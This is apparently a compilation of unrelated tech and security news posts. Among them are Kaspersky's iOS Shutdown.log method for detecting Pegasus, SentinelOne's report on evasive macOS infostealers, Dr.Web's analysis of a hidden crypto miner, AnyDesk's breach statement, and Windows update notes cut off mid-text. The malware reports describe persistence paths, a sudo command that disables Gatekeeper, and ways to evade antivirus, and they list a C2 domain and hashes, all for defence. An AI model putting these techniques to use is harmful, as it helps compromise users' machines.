SeedTheNet

Following indications of an incident on some of our systems, we conducted a security audit and found evidence of compromised production systems. We immediately activated a remediation and response plan involving cyber security experts CrowdStrike. The remediation plan has concluded successfully. The relevant authorities have been notified and we are working closely with them. This incident is not related to ransomware. We have revoked all security-related certificates and systems have been remediated or replaced where necessary. We will be revoking the previous code signing certificate for our binaries shortly and have already started replacing it with a new one. Our systems are designed not to store private keys, security tokens or passwords that could be exploited to connect to end user devices. As a precaution, we are revoking all passwords to our web portal, my.anydesk.com, and we recommend that users change their passwords if the same credentials are used elsewhere. To date, we have no evidence that any end-user devices have been affected. We can confirm that the situation is under control and it is safe to use AnyDesk. Please ensure that you are using the latest version, with the new code signing certificate. The integrity and trust in our products is of paramount importance to us and we are taking this situation very seriously. https://anydesk.com/en/public-statement Affected certificate version is in 8.0.6 , the new certificate can be found in version 8.0.8

You've been waiting patiently, but the Multiplayer Open Beta is now here . Get ready to engage in exciting 5v5 online matches, starting today and until February 16. It is an Open Beta, meaning that everyone will be accepted automatically and immediately. It also means you are able to stream the game, make videos of it and upload them, talk about it with your friends. Simply put, there will be no NDA restrictions. It is a multiplayer beta only and it contains no single-player content whatsoever. The game at launch will contain single-player scenarios and single-player campaigns, but the purpose of this playtest phase is to test online play. The beta build currently contains 6 multiplayer maps playable in 5vs5 with only 4 out of the ten specializations the game will contain at launch, for the two playable factions, USA and Russia. If you want more information on what the open beta contains, please refer to this post. How to download and install The Open Beta is only available through Steam. In order to download it, head to the steam page of Broken Arrow You will need to click on the green button which says REQUEST ACCESS . You will be given access automatically and "Broken Arrow Playtest" will appear in your Steam Library. Then, all you need to do is to click Install and the download will start. Please note that you might be required to close and relaunch Steam in order for the download to begin. Multiplayer challenge We have decided to challenge the community with a contest: during those 16 days players will have the chance to climb two unique leaderboards: K/D ratio and Win/Loss ratio. At the end of the open beta we’ll know who the winners and top players among the community are. We will also reward the most active player for the duration of the beta. Victory will be rewarded with the possibility of taking part in a special live round table with the developers: those who manage to get in the first five positions of each leaderboard will get the chance to take part in this live event with Steel Balalaika and they will be able to talk with the developers, offering them feedback and opinions and asking whatever they want about the game. We’ll make sure to update you daily on Discord on who is leading each leaderboard. Struggling with the basics? If you're struggling with learning how to play, don't worry. The game at launch will feature ways for new players to be gradually introduced to gameplay mechanics and they will be able to learn the ropes, but for now please refer to this short guide. It serves as a useful guide to get started and learn the basics. Should you still have trouble please join our discord channel: Broken Arrow has a big and helpful community and plenty of experienced players willing to lend a hand and teach newcomers. Have fun!

Authors Maher Yamout A reboot a day can keep the fuckers away Introduction In the ever-evolving landscape of mobile security, hunting for malware in the iOS ecosystem is akin to navigating a labyrinth with invisible walls. Imagine having a digital compass that not only guides you through this maze, but also reveals the hidden mechanisms of iOS malware previously shrouded in mystery. This is not a tool – this is the nature of digital forensic artifacts. In this blog post, we’ll explore one particular forensic artifact that stands out for uncovering some of the most elusive malware on iOS devices and shedding more light on the traces left by the sophisticated threats endangering the trusted companions in our pockets. In 2021 and 2022, we had the privilege of working on a few Pegasus malware infections on several iPhone devices. The iPhones were Initially given to us by our partners for general security checks before we discovered the infections. Investigating such cases can be complicated, costly, or time consuming due to the nature of the iOS ecosystem. As a result, related threats can often go undetected by the general public. To date, the common methods for analyzing an iOS mobile infection are either to examine an encrypted full iOS backup, or to analyze the network traffic of the device in question. Both methods, however, are time consuming or require a high level of expertise, which limits their use. Through our analysis, we discovered that the infections left traces in an unexpected system log, Shutdown.log, which is a system log file available on any mobile iOS device. Since the detection method was consistent across several infections we’ve analyzed, we thought we would dissect and understand this log file in more detail, as it could be used as another method to detect mobile malware. Overview of an iOS artifact: Shutdown.log Shutdown.log is a text-based log file created on iOS devices. Each reboot event is logged in this file along with multiple environment characteristics. Having looked at dozens of these log files, they can have entries going back several years, which can provide a wealth of information. When a user initiates a reboot, the operating system attempts to gracefully terminate running processes before rebooting. If a “client” process is still running when the reboot activity begins, it is logged with its process identifier (PID) and corresponding filesystem path. The log entry notes that these processes prevented a normal reboot and that the system is waiting for them to terminate. A UNIX timestamp is provided for the system event indicating that memory buffers are flushed in preparation for a full OS shutdown. Sample snippet from an iOS Shutdown.log file Compared to more time-consuming acquisition methods like forensic device imaging or a full iOS backup, retrieving the Shutdown.log file is rather straightforward. The log file is stored in a sysdiagnose (sysdiag) archive. Sysdiag can be thought of as a collection of system logs and databases that can be generated for debugging and troubleshooting purposes. The method for generating a sysdiag may differ from one iOS version to another. Nevertheless, this archive can be found in the OS general settings, specifically under “Privacy and Analytics”, although again the exact location name may differ between iOS versions. The archive is created relatively quickly, typically taking only a few minutes. The result is a .tar.gz file about 200-400MB in size. This file can then be transferred to the analysis machine. Once the archive is unpacked, the Shutdown.log file is located within the “\system_logs.logarchive\Extra” directory. Malware detections and lessons learned When we first started analyzing the supposedly infected phones, we tested them with the MVT tool developed by Amnesty International. At the time, MVT identified malware indicators by parsing the DataUsage database, among other forensic artifacts. Because mobile malware was becoming more prevalent, and detection methods were time consuming, we looked for a faster and easier method. While network traffic analysis can be a very effective lightweight method for identifying a potential iPhone infection, processing network traffic can require a high level of expertise and resources. Sysdiag dump analysis is a minimally intrusive and a resource-light method of identifying possible iPhone infections using system-based artifacts. It can serve to supplement infection identification from a different vantage point. If we take a sample log file for a spin, it shows a known Pegasus infection trace under “/private/var/db/com.apple.xpc.roleaccountd.staging/rolexd”. Sample infection trace in a Shutdown.log entry Having received the infection indicator in this log and confirmed the infection using MVT’s processing of other iOS artifacts, this log now becomes part of a holistic approach to investigating the infection. Since we confirmed the consistency of this behavior with the other Pegasus infections we analyzed, we believe it will serve as a reliable forensic artifact to support infection analysis. While analyzing the various infections, we made several observations. One of the infected phones had infection indicators in the usual artifacts such as the DataUsage database, but there were no traces in the Shutdown.log. Further analysis revealed that the user didn’t reboot on the day of the infection. This observation makes sense, since Shutdown.log only records entries upon reboot. Another interesting observation we made on another infected phone is that occasionally, when there’s a “sticky” process preventing a reboot such as the processes related to Pegasus, the log file will also record a notification indicating that a reboot was delayed; we’ve observed Pegasus-related processes in more than four reboot delay notices. While we did see instances of non-infected phones with two to three reboot delay notices, we consider excessive delays (more than four) to be another log anomaly that needs to be investigated. As we continued researching sysdiag archives and Shutdown.log, we read up on CitizenLab’s analysis of Reign and spotted something we had seen before: the malware’s path. Reign malware path in iOS filesystem, identified by CitizenLab Comparing the Shutdown.log for the Pegasus infections we analyzed and the artifacts for the Reign path above, we noticed other similarities with such infections. Malware execution originating from “/private/var/db/” seems to be consistent across all the infections we’ve seen, even if the process names are different. This is also true for another mobile malware family, Predator, where a similar path, “/private/var/tmp/”, is often used. Since all three malware families were using a similar filesystem path, and since we confirmed from the Pegasus infection analysis that such a path can be seen in Shutdown.log, we believe that this log file may be able to help identify infections by these malware families. But there’s a BIG caveat… the user needs to reboot as often as possible. How often, you may ask? Well, it depends! It depends on the user’s threat profile; every few hours, every day, or perhaps around “important events”; we’ll leave this as an open-ended question. Analysis scripts To automate the analysis process, we’ve created a few Python3 scripts to help extract, analyze and parse the Shutdown.log artifact. As a prerequisite, the user needs to generate a sysdiag dump and extract the archive to the analysis machine. Script 1: iShutdown_detect The first script is about detecting the anomalies mentioned above, inside the Shutdown.log. The script analyzes the log file in question in the background and displays any of the anomalies. Think of this script as a lightweight method to analyze a forensic artifact for unusual entries. It’s meant to support an investigation, not as a silver bullet. The examples below show some of the results you would expect to see: “Sticky” processes delaying reboot more than three times Detecting an instance of Pegasus indicator Detecting an instance of Pegasus indicator with more than three delays for rebooting Script 2: iShutdown_parse We understand that there are instances where analysts and users want to share their log files and parse them for different purposes. So this script is an attempt to support that need. This script takes a sysdiag archive as an argument and extracts the Shutdown.log file from it. If instructed, it will also convert it to a CSV file, decode the timestamps, and generate a summary of the parsing that includes the source sysdiag and the extracted Shutdown.log hashes. Log extraction and parsing output Script 3: iShutdown_stats The last script can be used for various purposes, such as understanding how often or when a user has rebooted the phone. This script takes into account that you have extracted the log file in question as it takes it, and not the sysdiag archive, as an argument. Reboot stats of a target Shutdown.log Conclusion In conclusion, we’ve analyzed and confirmed the reliability of detecting a Pegasus malware infection using the Shutdown.log artifact stored in a sysdiag archive. The lightweight nature of this method makes it readily available and accessible. Moreover, this log file can store entries for several years, making it a valuable forensic artifact for analyzing and identifying anomalous log entries. Again, this is not a silver bullet that can detect all malware, and this method relies on the user rebooting the phone as often as possible. We’ll continue to analyze the Shutdown.log file in more detail and on different platforms. We expect to be able to create more heuristics from the entries in it. We’d love to hear from you if you have any interesting samples that could contribute to this research. As you have seen in this blog, and can even see in your own sysdiag analysis, the Shutdown.log file does not contain any personal information, so feel free to contact us at intelreports@kaspersky.com if you’d like to contribute. Source : https://securelist.com/shutdown-log-lightweight-ios-malware-detection-method/111734/

The Many Faces of Undetected macOS InfoStealers | KeySteal, Atomic & CherryPie Continue to Adapt We have been reporting on the rise of infostealers targeting macOS since early last year, but threat actors show no signs of slowing down. Throughout last year, we saw variants of Atomic Stealer, macOS MetaStealer, RealStealer and others. Recent updates to macOS’s XProtect signature database indicate that Apple are aware of the problem, but early 2024 has already seen a number of stealer families evade known signatures. In this post, we provide details on three active infostealers that are currently evading many static signature detection engines. We provide a high-level overview of each along with relevant indicators to aid threat hunters and defenders. KeySteal | Jumping on the AI Bandwagon First noted in 2021, the internals of KeySteal have changed markedly since it was first described by Trend Micro. Apple added a signature almost a year ago to XProtect in v2166 (Feb 2023), but this no longer detects current versions, some of which are distributed as a binary named “ChatGPT”. A recent sample of KeySteal uses the name ‘ChatGPT’ for its executable Initially, KeySteal was distributed in .pkg format with an embedded macOS utility called “ReSignTool” – a legitimate open-source application for signing and bundling apps into .ipa files for distribution on iOS devices. The malware authors modified the code to steal Keychain information and to drop persistence components in the following locations: /Library/LaunchDaemons/com.apple.googlechrome.plist ~/Library/LaunchAgents/com.apple.googleserver.plist The latest round of KeySteal samples have changed considerably. They no longer leverage the ReSign tool and instead appear in multi-architecture Mach-O binaries with names such as “UnixProject” and “ChatGPT”. Distribution methods are unclear at this time. Some of the most recent versions undetected by XProtect also enjoy low detection scores on VirusTotal. Undetected by XProtect, these KeySteal samples also have low scores on VirusTotal Both versions are written in Objective C but the primary methods responsible for the malicious behavior have changed from JKEncrypt in the early versions to UUnixMain, KCenterModity, and ICenterModity in the most recent versions. One factor in common between the early and current iterations of KeySteal is the hardcoded C2, and threat hunters and static detections will still have some luck pivoting off that. usa[.]4jrb7xn8rxsn8o4lghk7lx6vnvnvazva[.]com However, it is quite unusual for threat actors not to rotate C2 addresses, and we would encourage defenders to develop better hunting and detection rules to detect KeySteal in advance of an inevitable change. KeySteal samples that we have observed are signed with an ad hoc code signature with artifacts suggesting the binary was built in Xcode, Apple’s development IDE. KeySteal sample with an ad hoc code signature Atomic InfoStealer | Multiple Variants Continue to Evade We first wrote about Atomic Stealer last year, and since then ourselves and other industry peers have noted a number of changes. Many of these iterations are being seen in the wild concurrently, indicating completely different development chains rather than one core version that is being updated. Prior to this writing, Malwarebytes reported on an obfuscated Go version of Atomic Stealer which appeared shortly after Apple’s XProtect update v2178 (Jan 2024). Apple’s update included a detection rule for the version described by MalwareBytes under the rulename SOMA_E. However, we have already seen variations appearing since then that are not currently detected by XProtect. Another bunch of #Amos #AtomicStealer samples that evade the recent #XProtect v2178 SOMA_E signature.#apple #security #malwarehttps://t.co/m3ubSlopDU pic.twitter.com/MPhMavJM3S — Phil Stokes ⫍⫎ (@philofishal) January 12, 2024 Some of these samples also have low detection scores on VirusTotal at the time of writing. The most recent version of Atomic Stealer are not well detected on VirusTotal This version of Atomic Stealer is written in C++ and includes logic to prevent the victims, analysts or malware sandboxes from running the Terminal at the same time as the stealer. In addition, it checks to see if the malware is being run inside a Virtual Machine. Atomic Stealer closes the Terminal Unlike the obfuscated versions from earlier in January, these samples use hard-coded AppleScript in clear text, clearly indicating the malware’s stealing logic. Atomic still makes heavy use of hardcoded AppleScript Initial distribution is likely through torrents or gaming-focused social media platforms as the malware continues to appear in .dmg form with names such as ‘CrackInstaller’ and ‘Cozy World Launcher’. An Atomic Stealer installer instructing the victim to override Gatekeeper control CherryPie | Caught by Apple, But Many Static Engines Lagging Behind macOS CherryPie was added to XProtect in v2176. Also known as Gary Stealer, AT&T Labs described the same malware as “JaskaGo” in December 2023. CherryPie / Gary Stealer 09de6c864737a9999c0e39c1391be81420158877 While Apple’s XProtect rule continues to remain robust against further samples that we have identified, VirusTotal engines are faring less well in some cases. The following sample – first uploaded on 09, Sept 2023 – along with its embedded malware binary, remains undetected on VirusTotal as of today. macOS.CherryPie undetected on VirusTotal CherryPie is a cross-platform Windows/macOS stealer written in Go and containing extensive logic for anti-analysis and VM detection. Despite that, the malware authors have left seemingly obvious strings embedded in the malware to indicate both its purpose (stealer) and its intent (malicious). CherryPie contains some rather telling hardcoded strings Some versions of CherryPie use the legitimate open-source Wails project to wrap their malicious code into an application bundle. CherryPie samples we have observed are signed with an ad hoc signature. As part of the application’s set up it also calls the macOS spctl utility with the --master-disable argument. This code is used to disable Gatekeeper and is run with administrator privileges via sudo. macOS.CherryPie attempts to disable Gatekeeper with admin privileges SentinelOne Detects macOS InfoStealers SentinelOne customers are protected from macOS KeySteal, Atomic InfoStealer, and CherryPie/Gary Stealer. With the policy set to ‘Detect-Only’, the SentinelOne agent issues alerts for each of the threats when executed. When the policy is set to ‘Protect’ the malicious behaviors are killed without any action needed from the management console. Conclusion The continued prevalence and adaptation of macOS infostealers like KeySteal, Atomic InfoStealer, and CherryPie underscores the ongoing challenges facing macOS enterprise users. Despite solid efforts by Apple to update its XProtect signature database, these rapidly evolving malware strains continue to evade. Given these challenges, it is vital to adopt a comprehensive, defense-in-depth approach. Relying solely on signature-based detection is insufficient as threat actors have the means and motive to adapt at speed. Aside from a modern EDR platform with native macOS capabilities, proactive threat hunting, enhanced detection rules, and awareness of the evolving tactics can help security teams to stay ahead of threats targeting the macOS platform. To learn how SentinelOne can help protect the macOS devices in your fleet, contact us or request a free demo. Indicators of Compromise KeySteal 95d775b68f841f82521d516b67ccd4541b221d17 f75a06398811bfbcb46bad8ab8600f98df4b38d4 usa[.]4jrb7xn8rxsn8o4lghk7lx6vnvnvazva[.]com Atomic InfoStealer 1b90ea41611cf41dbfb2b2912958ccca13421364 2387336aab3dd21597ad343f7a1dd5aab237f3ae 8119336341be98fd340644e039de1b8e39211254 973cab796a4ebcfb0f6e884025f6e57c1c98b901 b30b01d5743b1b9d96b84ef322469c487c6011c5 df3dec7cddca02e626ab20228f267ff6caf138ae CherryPie 04cbfa61f2cb8daffd0b2fa58fd980b868f0f951 09de6c864737a9999c0e39c1391be81420158877 6a5b603119bf0679c7ce1007acf7815ff2267c9e 72dfb718d90e8316135912023ab933faf522e78a 85dd9a80feab6f47ebe08cb3725dea7e3727e58f 104[.]243[.]38[.]177 https://www.sentinelone.com/blog/the-many-faces-of-undetected-macos-infostealers-keysteal-atomic-cherrypie-continue-to-adapt/

Hidden crypto miner in pirated software makes cybercriminals rich at the expense of their victims January 15, 2024 Doctor Web is reporting on an increase in cases of cryptocurrency-mining trojans being found hidden in pirated software that is available in Telegram and on some Internet sites. In December 2023, virus analysts at Doctor Web noticed an increase in the detection rates of Trojan.BtcMine.3767 and its companion malware Trojan.BtcMine.2742, which, as it turned out, were ending up on users' computers with pirated software. Trojan.BtcMine.3767 is a trojan program for Windows written in C++. It is a crypto-miner loader based on the SilentCryptoMiner project. The platforms used to distribute the infected software packages are the t[.]me/files_f Telegram channel (over 5,000 subscribers) and the itmen[.]software and soft[.]sibnet[.]ru websites. Interestingly, in the latter case the hackers went the extra mile and prepared custom builds using the NSIS installer. After unpacking the installation packages, our analysts discovered the paths used by the attackers to store the trojan's source files: C:\bot_sibnet\Resources\softportal\exe\ C:\bot_sibnet\Resources\protect_build\miner\ According to the Dr.Web malware analysis lab, in one of the distribution campaigns the trojan has infected over 40 000 computers in a little less than two months. Considering the number of views in Telegram and website traffic, the scale of the problem may be much larger. When launched, the loader copies itself to the %ProgramFiles%\google\chrome\ directory under the name updater.exe and creates a scheduler task so that it can run on startup. To make it look harmless, the task is named GoogleUpdateTaskMachineQC. In addition, the loader adds its file to the Windows Defender exceptions and prevents the computer from shutting down and hibernating. The initial settings are embedded in the trojan and then updated from a remote host. Once initialized, the loader injects Trojan.BtcMine.2742, the payload responsible for hidden cryptocurrency mining, into the explorer.exe process. In addition, this loader allows the r77 fileless rootkit to be installed on a compromised computer, Windows updates to be disabled, website access to be blocked, trojan source files to be auto-deleted and -restored, the cryptomining process to be suspended, and the RAM and VRAM occupied by the miner to be unloaded when the computer user runs process-monitoring programs. Dr.Web anti-virus successfully detects and neutralizes Trojan.BtcMine.3767 and Trojan.BtcMine.2742, so they do not pose a threat to our users. https://news.drweb.com/show/?i=14792&lng=en

A resident of Mykolaiv infected the server of a well-known American company with a miner virus. In the course of an international police operation, law enforcement officers conducted searches and stopped the activity of the hacker. Operatives of the Cyber Police Department and investigators of the Main Investigative Department of the National Police under the procedural guidance of the Prosecutor General's Office together with colleagues from Europol (the EU law enforcement agency for combating international organized crime) exposed the 29-year-old hacker. Starting in 2021, the man infected the servers of one of the world's largest e-commerce companies. First, the hacker "hacked" 1,500 accounts of the subsidiary company. For this, the attacker used self-developed software for automatic password selection - the so-called "brutforce". Using compromised accounts, the hacker gained access to the management of the service. In the future, the person involved created a computer virus-miner for cryptocurrency mining, which secretly infected the company's server equipment. To ensure the operation of the malicious software, the hacker created more than one million virtual computers. It was established that for more than two years of criminal activity, the man withdrew almost two million US dollars in cryptocurrency to controlled electronic wallets, which is equivalent to more than 75 million hryvnias. With the support of the TOR special unit, law enforcement officers conducted authorized searches in the suspect's premises on the territory of Mykolaiv. Computer equipment, bank and SIM cards, electronic media and other evidence of illegal activity were seized. On the territory of the Netherlands, Europol established a special working group and a VCP (Virtual Command Point) for the urgent analysis of information received during investigative actions on the territory of Ukraine. Europol provided assistance in blocking the electronic wallets of the person involved with the assets on them. Investigators of the Main Investigative Department of the National Police have opened criminal proceedings under Part 5 of Art. 361 (Unauthorized interference in the work of information (automated), electronic communication, information and communication systems, electronic communication networks) of the Criminal Code of Ukraine. Investigative actions are ongoing with the aim of establishing possible accomplices of the figure and his involvement in pro-Russian hacker groups. Based on the results, additional qualification is possible. Cyber Police Department of the National Police of Ukraine Source : https://cyberpolice.gov.ua/news/zavdav-providnij-svitovij-kompaniyi-sotni-miljoniv-zbytkiv-kiberpolicziya-ta-slidchi-naczpolu-vykryly-xakera-2238/

The Last of Us Part II Remastered key features Experience an array of technical enhancements that make The Last of Us Part II Remastered the definitive way to play Ellie and Abby’s critically acclaimed story. Native PS5 enhancements Built for the PS5, The Last of Us Part II Remastered enhances the original PS4 game in ways not possible before. Visual performance now includes native 4K1 output in Fidelity Mode, 1440p upscaled to 4K in Performance Mode, and an Unlocked Framerate option for TVs that support VRR. The Last of Us Part II Remastered also includes improved load times to let you jump right back into the action. Descriptive Audio and Speech to Vibrations have also been added to The Last of Us Part II Remastered's suite of accessibility features. No Return – A roguelike survival mode Experience deep combat via an entirely new mode! Survive as long as you can in each run as you choose your path through a series of randomized encounters featuring different foes and memorable locations from throughout The Last of Us Part II, all culminating in tense boss battles. Unique gameplay modifiers can offer new and unexpected challenges as you fight to succeed – and survive – in a host of different encounter types. Play as a variety of characters including never-before-playable characters like Dina, Jesse, Lev, Tommy and more,2 each with unique traits to offer different playstyles, and unlock skins for them as you progress to use in the mode. Find out more about No Return. New ways to play Delve deeper into this beloved adventure and learn how the original game was created. Lost Levels let you explore early-development versions of three new levels not seen in the original The Last of Us Part II: Sewers, Jackson Party and Boar Hunt. Enjoy hours of new developer commentary about The Last of Us Part II’s development as you experience the game. Live up to your musical potential with Guitar Free Play, which includes new instruments2, or take on the new Speedrun Mode2 and post your best times. Take incredible Photo Mode shots with additions like dynamic lighting, Frame Forward, and Gaze Direction, as well as new frame and logo options. The Last of Us Part II Remastered also features brand new unlockable character and weapon skins for players to use for both Ellie and Abby. Graphical improvements and full DualSense™ wireless controller support The beautiful yet dangerous world of The Last of Us Part II Remastered is brought to new life on the PS5. This version features increased texture resolution, increased Level-of-Detail distances, improved shadow quality, animation sampling rate, and more. The Last of Us Part II Remastered also makes full use of the DualSense wireless controller's haptic feedback and adaptive triggers to allow every weapon to feel distinct and convey an increased sense of presence in your surroundings as you explore the snowy mountains of Jackson and the rain-drenched city streets of Seattle. 14K requires 4K display. 2Game progression required to unlock. https://www.playstation.com/en-tr/games/the-last-of-us-part-ii-remastered/ As promised by Naughty Dog was the Multiplayer part of Last of Us 2 , They will release a remaster of the game while probably most likely , there is no need for this remaster other than to keep milking the franchise to bring more money for their next project , so as far as it goes probably the promised multiplayer part is cancelled.

Windows 10, version 1607, all editions Windows Server 2016, all editions Release Date: 1/9/2024 Version: OS Build 14393.6614 11/19/20 For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1607, see its update history page. Highlights This update addresses security issues for your Windows operating system. Improvements This security update includes quality improvements. When you install this KB: This update addresses an issue that affects the ActiveX scroll bar. It does not work in IE mode. If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the new Security Update Guide website and the January 2024 Security Updates. Known issues in this update Microsoft is not currently aware of any issues with this update. How to get this update Before installing this update Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. If you are using Windows Update, the latest SSU (KB5032391) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog. Install this update Release Channel Available Next Step Windows Update and Microsoft Update Yes None. This update will be downloaded and installed automatically from Windows Update. Windows Update for Business Yes None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. Microsoft Update Catalog Yes To get the standalone package for this update, go to the Microsoft Update Catalog website. Windows Server Update Services (WSUS) Yes This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10 Classification: Security Updates File information For a list of the files that are provided in this update, download the file information for cumulative update 5034119.

Windows Server 2022 Release Date: 1/9/2024 Version: OS Build 20348.2227 For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows Server 2022, see its update history page. Note Follow @WindowsUpdate to find out when new content is published to the Windows release health dashboard. Improvements This security update includes quality improvements. When you install this KB: This update addresses an issue that affects Microsoft Intune. One of its new features does not work properly. This update addresses an issue that affects account lockout event 4625. The format of the event is wrong in the ForwardedEvents log. This occurs when an account name is in the user principal name (UPN) format. This update addresses an issue that affects hybrid joined devices. You cannot sign in to them if they are not connected to the internet. This occurs when you use a Windows Hello for Business PIN or biometric credentials. This issue applies to a cloud trust deployment. This update addresses an issue that affects the Trusted Sites Zone logon policy. You cannot manage it using mobile device management (MDM). This update addresses an issue that affects Microsoft Excel. It stops responding when you try to share a file as a PDF in Outlook. This update addresses an issue that affects the Server Manager pop-up text. It removes the words “Azure Automanage.” This update addresses an issue that affects XPath queries on FileHash and other binary fields. It stops them from matching values in event records. This update addresses an issue that affects certain network functions on VMs. Deployment of them fails. This update addresses an issue that affects the Network Controller. The issue makes you create more rules for outbound traffic so that return traffic is not blocked. This update addresses an issue that affects a WS_EX_LAYERED window. The window might render with the wrong dimensions or at the wrong position. This occurs when you scale the display screen. This update addresses an issue that affects printing to PDF metadata. It extracts the username that you sign in with and puts it into the author name metadata box. Instead, print to PDF should place your display name in that box. This update addresses an issue that affects disk partitions. Your system might stop responding. This occurs if you add space from a deleted partition to an existing BitLocker partition. This update addresses an issue that affects Windows Defender Application Control (WDAC). AppID Tagging policies might greatly increase how long it takes your device to start up. This update addresses an issue that causes your device to shut down after 60 seconds. This occurs when you use a smart card to authenticate on a remote system. This update addresses an issue that affects the display of a smart card icon. The icon does not appear when you sign in. This occurs when there are multiple certificates on the smart card. This update addresses an issue that affects Active Directory domain controllers. They report DS_BUSY errors when you create new users. This only occurs on primary domain controller emulators (PDCe). This update addresses an issue that affects the Windows Local Administrator Password Solution (Windows LAPS). The LAPS account does not work. This occurs if the password is older than the age that the maximum age device policy allows. This update addresses an issue that affects the Kerberos Key Distribution Center (KDC). It returns a KDC_ERR_S_PRINCIPAL_UNKNOWN error during trust referrals, which is wrong. This update addresses an issue that affects the msDS-KeyCredentialLink attribute. In some cases, it is updated when it should not be. This update addresses an issue that causes lsass.exe to stop responding. Because of this, a restart loop occurs. This update addresses an issue that affects the Key Distribution Service (KDS). It does not start in the time required if LDAP referrals are needed. If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the Security Update Guide and the January 2024 Security Updates. Windows Server 2022 servicing stack update - 20348.2200 This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. Known issues in this update Symptom Workaround After you install KB5034129, chromium-based internet browsers, such as Microsoft Edge, might not open correctly. Browsers affected by this issue might display a white screen and become unresponsive when you open them. Devices that have browser specific Image File Execution Options (IFEO) might be affected by this issue. When an entry for Microsoft Edge (msedge.exe) or other chromium-based browsers is found in the Windows registry, the issue might occur. A registry entry can be created by developer tools or when certain debugging and diagnostic settings are in place for browsers. You can prevent this issue by removing certain keys related to Image File Execution Options in the Windows registry. Important This article contains information about how to modify the registry. Make sure that you back up the registry before you modify it. Make sure that you know how to restore the registry if a problem occurs. For more information about how to back up, restore, and modify the registry, see How to back up and restore the registry in Windows. Modify the Windows registry using the steps below. Open the Windows Registry Editor. Open the Windows start menu and type regedit. Select Registry Editor from the results. Go to the registry location Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\. Type this location in the path field that is below the File menu or use the left-side panel of the editor to find that path. Expand this path in the editor. At that location, find the registry key related to the browser that is in use (denoted with a folder icon). Examples of the key name include msedge.exe for Microsoft Edge or chrome.exe. Click the key. Examine the right-side panel that contains values associated with the key. If the right-side panel only includes a value titled “(Default)”, it should be safe to remove the registry key. Right-click the key in the left-side panel of the editor and select Delete. After this, restart the device. This should address the issue, and the browser should open as expected. If the right-side panel contains several values in addition to the one titled “(Default)”, it is still possible to address the issue by removing the registry key for this browser and restarting the device. However, note that doing so might remove configurations associated with the opening or starting process of the browser. We are working on a resolution and will provide an update in an upcoming release. How to get this update Before installing this update Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. Install this update Release Channel Available Next Step Windows Update and Microsoft Update Yes None. This update will be downloaded and installed automatically from Windows Update. Windows Update for Business Yes None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. Microsoft Update Catalog Yes To get the standalone package for this update, go to the Microsoft Update Catalog website. Windows Server Update Services (WSUS) Yes This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Microsoft Server operating system-21H2 Classification: Security Updates If you want to remove the LCU To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages. Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation. File Information For a list of the files that are provided in this update, download the file information for cumulative update 5034129. For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 20348.2200.

Win 10 Ent LTSC 2019 Win 10 IoT Ent LTSC 2019 Windows 10 IoT Core 2019 LTSC Windows Server 2019 Release Date: 1/9/2024 Version: OS Build 17763.5329 11/17/20 For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page. Highlights This update addresses an issue that causes IE mode to stop responding. This occurs if you press the left arrow key when an empty text box has the focus and caret (cursor) browsing is on. This update addresses an issue that affects touchscreens. They do not work properly when you use more than one monitor. This update addresses security issues for your Windows operating system. Improvements This security update includes improvements. When you install this KB: This update addresses an issue that affects the ActiveX scroll bar. It does not work in IE mode. This update addresses an issue that affects disk partitions. Your system might stop responding. This occurs if you add space from a deleted partition to an existing BitLocker partition. This update addresses an issue that causes your device to shut down after 60 seconds. This occurs when you use a smart card to authenticate on a remote system. This update addresses an issue that affects the Windows Local Administrator Password Solution (Windows LAPS). The LAPS account does not work. This occurs if the password is older than the age that the maximum age device policy allows. This update addresses an issue that affects the Kerberos Key Distribution Center (KDC). It returns a KDC_ERR_S_PRINCIPAL_UNKNOWN error during trust referrals, which is wrong. This update addresses an issue that causes lsass.exe to stop responding. Because of this, a restart loop occurs. This update addresses an issue that affects the Key Distribution Service (KDS). It does not start in the time required if LDAP referrals are needed. This update addresses an issue that affects the Server Manager pop-up text. It removes the words “Azure Automanage.” This update addresses an issue that affects Group Policy Folder Redirection in a multi-forest deployment. The issue stops you from choosing a group account from the target domain. Because of this, you cannot apply advanced folder redirection settings to that domain. This issue occurs when the target domain has a one-way trust with the domain of the admin user. This issue affects all Enhanced Security Admin Environment (ESAE), Hardened Forests (HF) or Privileged Access Management (PAM) deployments. This update addresses a known issue that affects BitLocker data-only encryption. A mobile device management (MDM) service, such as Microsoft Intune, might not get the right data. This occurs when you use the FixedDrivesEncryptionType or SystemDrivesEncryptionType policy settings in the BitLocker configuration service provider (CSP) node. If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the new Security Update Guide website and the January 2024 Security Updates. Windows 10 servicing stack update - 17763.5084 This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. Known issues in this update Microsoft is not currently aware of any issues with this update. How to get this update Before installing this update Microsoft now 